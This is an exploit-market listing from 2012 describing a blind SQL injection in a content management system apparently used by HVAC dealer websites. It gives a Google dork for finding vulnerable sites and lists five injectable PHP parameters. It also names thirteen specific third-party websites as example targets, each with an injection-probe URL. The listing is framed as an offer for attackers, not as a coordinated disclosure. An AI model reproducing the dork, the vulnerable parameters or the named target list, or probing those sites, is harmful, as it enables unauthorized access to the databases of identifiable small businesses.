[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Base Content Management System Lennox Industries - Blind SQL Injection

Author
the_cyber_nuxbie
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17337
Category
web applications
Date add
04-01-2012
Platform
php
[ Base Content Management System Lennox Industries - Blind SQL Injection Vulnerability ]
#[~] Author       : the_cyber_nuxbie
#[~] Home         : www.thecybernuxbie.com
#[~] E-mail       : staff@thecybernuxbie.com
#[~] Found        : 04 January 2012 - 08:45 PM.
#[~] Tested On    : Back|Track 5.
#[~] Auto-Tools   : SQL Manual + h*v*j.
#[~] Google Dork  : inurl:"/products-sub.php?id="

- Files Vuln:
../products-sub.php?id=[ Your Skill SQLi ]
../specials.php?id=[ Your Skill SQLi ]
../services.php?id=[ Your Skill SQLi ]
../resources.php?id=[ Your Skill SQLi ]
../aboutus.php?id=[ Your Skill SQLi ]

- Example Target Category:
http://www.albemarleheating.net/products-sub.php?id=114' [SQLi]
http://www.markemeacham.com/products-sub.php?id=511' [SQLi]
http://www.callsouzas.com/products-sub.php?id=105' [SQLi]
http://www.robertsheatandair.com/products-sub.php?id=113' [SQLi]
http://www.norcoha.com/products-sub.php?id=111' [SQLi]
http://www.prudentialhvac.com/products-sub.php?id=128' [SQLi]
http://www.wayneshvac.com/products-sub.php?id=500' [SQLi]
http://www.comfortrightdayornight.com/products-sub.php?id=455' [SQLi]
http://www.myattandbates.com/products-sub.php?id=112' [SQLi]
http://www.myattandbates.com/specials.php?id=85' [SQLi]
http://www.albemarleheating.net/services.php?id=560' [SQLi]
http://www.markemeacham.com/aboutus.php?id=101' [SQLi]
http://www.albemarleheating.net/resources.php?id=104' [SQLi]

- N0T35:
"n0 d0rk f0r kiddi0t"

Thanks To:
All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc...

- 04 January 2012, GMT +08:35, IT-Underground, Indonesia.



#  0day.today [2024-12-26]  #